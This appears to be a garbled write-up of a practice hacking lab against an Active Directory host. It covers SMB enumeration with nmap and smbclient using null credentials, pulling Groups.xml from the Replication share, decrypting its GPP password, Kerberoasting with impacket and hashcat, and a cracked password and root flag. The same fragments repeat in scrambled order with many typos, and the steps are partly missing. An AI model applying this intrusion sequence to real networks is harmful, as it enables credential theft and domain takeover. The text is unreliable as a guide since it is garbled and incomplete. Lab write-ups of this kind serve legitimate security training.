Found a python utility online. The python codo is as below. You need tyo install pycryptodome
The python code
Replace the cpassword in the python
Run the python script
Connect to the shartes using smbclient with the username and the password
use the impacket GetUserSPNs.py
Using hashcat and rockyou
Passwword is Ticketmaster1968
Connect with smbclient
Root flag b74a82c6fd9308eadeb3be8c43a6e766
| xargs grep categories | grep 'default\|version\|safe' | grep smb /usr/share/nmap/scripts/smb-double-pulsar-backdoor.nse:categories = {"vuln", "safe", "malware"} /usr/share/nmap/scripts/smb-enum-services.nse:categories = {"discovery","intrusive","safe"} /usr/share/nmap/scripts/smb-ls.nse:categories = {"discovery", "safe"} /usr/share/nmap/scripts/smb-mbenum.nse:categories = {"discovery", "safe"} /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-protocols.nse:categories = {"safe", "discovery"} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {"default", "discovery", "safe"} /usr/share/nmap/scripts/smb-vuln-ms17-010.nse:categories = {"vuln", "safe"} /usr/share/nmap/scripts/smb2-capabilities.nse:categories = {"safe", "discovery"} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {"safe", "discovery", "default"} /usr/share/nmap/scripts/smb2-time.nse:categories = {"discovery", "safe", "default"} /usr/share/nmap/scripts/smb2-vuln-uptime.nse:categories = {"vuln", "safe"}
so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100
Nothing much got from the above
Use SMBclient to list shares with nulll password
Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed
Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’
The above command did not work
Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””
From ChatGPT
- Groups.xml: The
Groups.xml
file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords. - Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.
Searching for this file after it downloaded with the mget
Found a python utility online. The python codo is as below. You need tyo install pycryptodome
The python code
Replace the cpassword in the python
Run the python script
Connect to the shartes using smbclient with the username and the password
use the impacket GetUserSPNs.py
Using hashcat and rockyou
Passwword is Ticketmaster1968
Connect with smbclient
Root flag b74a82c6fd9308eadeb3be8c43a6e766
| xargs grep categories | grep ‘default\|version’ | grep smb /usr/share/nmap/scripts/smb-os-discovery.nse:categories = {“default”, “discovery”, “safe”} /usr/share/nmap/scripts/smb-security-mode.nse:categories = {“default”, “discovery”, “safe”} /usr/share/nmap/scripts/smb2-security-mode.nse:categories = {“safe”, “discovery”, “default”} /usr/share/nmap/scripts/smb2-time.nse:categories = {“discovery”, “safe”, “default”}
if you want to check what also is included with the “safe” catagory;
so if you want to just run the safe alone we can use nmap –script safe -p 445 10.10.10.100
Nothing much got from the above
Use SMBclient to list shares with nulll password
Recursively check the Replication folder using Smbmap smbmap -r Replication -H 10.10.10.100. This failed
Going to try impacket smbclient.py with the command **smbclient.py ‘@IP_ADDRESS’ -share SHARE_NAME -command ‘recurse ON; prompt OFF; mget *’
The above command did not work
Used the following smbclient command smbclient //10.10.10.100/Replication -U “”%””
From ChatGPT
- Groups.xml: The
Groups.xml
file could contain information about local group policies, including potentially sensitive information like usernames and even encrypted passwords. - Groups.xml: You might find information on users or even passwords that you can decrypt and use for privilege escalation.
Searching for this file after it downloaded with the mget
Found a python utility online. The python codo is as below. You need tyo install pycryptodome
The python code
Replace the cpassword in the python
Run the python script
Connect to the shartes using smbclient with the username and the password
use the impacket GetUserSPNs.py
Using hashcat and rockyou
Passwword is Ticketmaster1968
Connect with smbclient
Root flag b74a82c6fd9308eadeb3be8c43a6e766